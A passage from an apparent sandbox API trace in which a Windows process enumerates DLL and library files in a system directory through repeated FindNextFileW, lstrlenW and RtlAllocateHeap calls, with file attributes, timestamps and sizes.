ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x2994413f, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7e0609f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AltTab.dll", cAlternateFileName="")) returned 1 [0025.910] lstrlenW (lpString="AltTab.dll") returned 10 [0025.910] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5cd138 [0025.910] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74a8a79f, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0x74a8a79f, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x74803050, ftLastWriteTime.dwHighDateTime=0x1ca03fd, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="amcompat.tlb", cAlternateFileName="")) returned 1 [0025.910] lstrlenW (lpString="amcompat.tlb") returned 12 [0025.911] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a29ac8e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a29ac8e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a29ac8e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x0, dwReserved1=0x0, cFileName="amstream.dll", cAlternateFileName="")) returned 1 [0025.911] lstrlenW (lpString="amstream.dll") returned 12 [0025.911] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5cd1d8 [0025.911] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76fcd8be, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x76fcd8be, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e0853e0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="amxread.dll", cAlternateFileName="")) returned 1 [0025.911] lstrlenW (lpString="amxread.dll") returned 11 [0025.911] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5cd280 [0025.911] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41bceeb, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xd41bceeb, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e4d7330, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a8c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apds.dll", cAlternateFileName="")) returned 1 [0025.912] lstrlenW (lpString="apds.dll") returned 8 [0025.912] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x92) returned 0x5cd320 [0025.912] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf21dc5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf21dc5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-console-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.912] lstrlenW (lpString="api-ms-win-core-console-l1-1-0.dll") returned 34 [0025.912] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc6) returned 0x5cd3c0 [0025.912] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cefbc66, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cefbc66, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-datetime-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.912] lstrlenW (lpString="api-ms-win-core-datetime-l1-1-0.dll") returned 35 [0025.912] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc8) returned 0x5cd490 [0025.913] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cd32bf2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cd32bf2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-debug-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.913] lstrlenW (lpString="api-ms-win-core-debug-l1-1-0.dll") returned 32 [0025.913] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc2) returned 0x5cd560 [0025.913] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-delayload-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.913] lstrlenW (lpString="api-ms-win-core-delayload-l1-1-0.dll") returned 36 [0025.913] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xca) returned 0x5cd630 [0025.913] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2ccc07d5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2ccc07d5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-errorhandling-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.913] lstrlenW (lpString="api-ms-win-core-errorhandling-l1-1-0.dll") returned 40 [0025.913] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd2) returned 0x5cd708 [0025.913] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cd7eeb0, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cd7eeb0, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-fibers-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.913] lstrlenW (lpString="api-ms-win-core-fibers-l1-1-0.dll") returned 33 [0025.913] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5cd7e8 [0025.913] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.913] lstrlenW (lpString="api-ms-win-core-file-l1-1-0.dll") returned 31 [0025.913] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc0) returned 0x5cd8b8 [0025.913] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8c9b158, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="")) returned 1 [0025.913] lstrlenW (lpString="api-ms-win-core-file-l1-2-0.dll") returned 31 [0025.914] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc0) returned 0x5cd980 [0025.914] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb859c590, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb859c590, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8c9b158, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="")) returned 1 [0025.914] lstrlenW (lpString="api-ms-win-core-file-l2-1-0.dll") returned 31 [0025.914] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc0) returned 0x5cda48 [0025.914] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cfe04a0, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cfe04a0, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-handle-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.914] lstrlenW (lpString="api-ms-win-core-handle-l1-1-0.dll") returned 33 [0025.915] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5cdb10 [0025.915] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0c4cda, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0c4cda, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-heap-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.915] lstrlenW (lpString="api-ms-win-core-heap-l1-1-0.dll") returned 31 [0025.915] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc0) returned 0x5cdbe0 [0025.915] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d078a1c, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d078a1c, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-interlocked-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.915] lstrlenW (lpString="api-ms-win-core-interlocked-l1-1-0.dll") returned 38 [0025.915] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xce) returned 0x5cdca8 [0025.915] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cce6934, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cce6934, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-io-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.915] lstrlenW (lpString="api-ms-win-core-io-l1-1-0.dll") returned 29 [0025.915] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xbc) returned 0x5cdd80 [0025.915] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-libraryloader-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.915] lstrlenW (lpString="api-ms-win-core-libraryloader-l1-1-0.dll") returned 40 [0025.915] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd2) returned 0x5cde48 [0025.915] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cce6934, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cce6934, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localization-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.915] lstrlenW (lpString="api-ms-win-core-localization-l1-1-0.dll") returned 39 [0025.915] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd0) returned 0x5cdf28 [0025.916] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb85502d0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb85502d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="")) returned 1 [0025.916] lstrlenW (lpString="api-ms-win-core-localization-l1-2-0.dll") returned 39 [0025.916] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd0) returned 0x5ce000 [0025.916] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localregistry-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.916] lstrlenW (lpString="api-ms-win-core-localregistry-l1-1-0.dll") returned 40 [0025.916] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd2) returned 0x5ce3b8 [0025.916] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0eae39, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0eae39, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-memory-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.916] lstrlenW (lpString="api-ms-win-core-memory-l1-1-0.dll") returned 33 [0025.916] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5ce498 [0025.916] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1833b5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1833b5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-misc-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.916] lstrlenW (lpString="api-ms-win-core-misc-l1-1-0.dll") returned 31 [0025.916] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc0) returned 0x5ce568 [0025.916] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-namedpipe-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.916] lstrlenW (lpString="api-ms-win-core-namedpipe-l1-1-0.dll") returned 36 [0025.916] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xca) returned 0x5ce630 [0025.916] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processenvironment-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.917] lstrlenW (lpString="api-ms-win-core-processenvironment-l1-1-0.dll") returned 45 [0025.917] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xdc) returned 0x5ce708 [0025.917] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processthreads-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.917] lstrlenW (lpString="api-ms-win-core-processthreads-l1-1-0.dll") returned 41 [0025.917] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd4) returned 0x5ce7f0 [0025.917] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="")) returned 1 [0025.917] lstrlenW (lpString="api-ms-win-core-processthreads-l1-1-1.dll") returned 41 [0025.917] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd4) returned 0x5ce8d0 [0025.917] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1370f7, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1370f7, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-profile-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.918] lstrlenW (lpString="api-ms-win-core-profile-l1-1-0.dll") returned 34 [0025.918] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc6) returned 0x5ce9b0 [0025.918] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d0c4cda, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d0c4cda, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-rtlsupport-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.918] lstrlenW (lpString="api-ms-win-core-rtlsupport-l1-1-0.dll") returned 37 [0025.918] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xcc) returned 0x5cea80 [0025.918] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1cf673, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1cf673, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-string-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.918] lstrlenW (lpString="api-ms-win-core-string-l1-1-0.dll") returned 33 [0025.918] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5ceb58 [0025.918] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d241a90, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d241a90, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-synch-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.918] lstrlenW (lpString="api-ms-win-core-synch-l1-1-0.dll") returned 32 [0025.918] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc2) returned 0x5cec28 [0025.918] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="")) returned 1 [0025.918] lstrlenW (lpString="api-ms-win-core-synch-l1-2-0.dll") returned 32 [0025.919] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc2) returned 0x5cecf8 [0025.919] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-sysinfo-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.919] lstrlenW (lpString="api-ms-win-core-sysinfo-l1-1-0.dll") returned 34 [0025.919] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc6) returned 0x5cedc8 [0025.919] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d267bef, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d267bef, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d265d70, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-threadpool-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.919] lstrlenW (lpString="api-ms-win-core-threadpool-l1-1-0.dll") returned 37 [0025.919] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xcc) returned 0x5cee98 [0025.919] 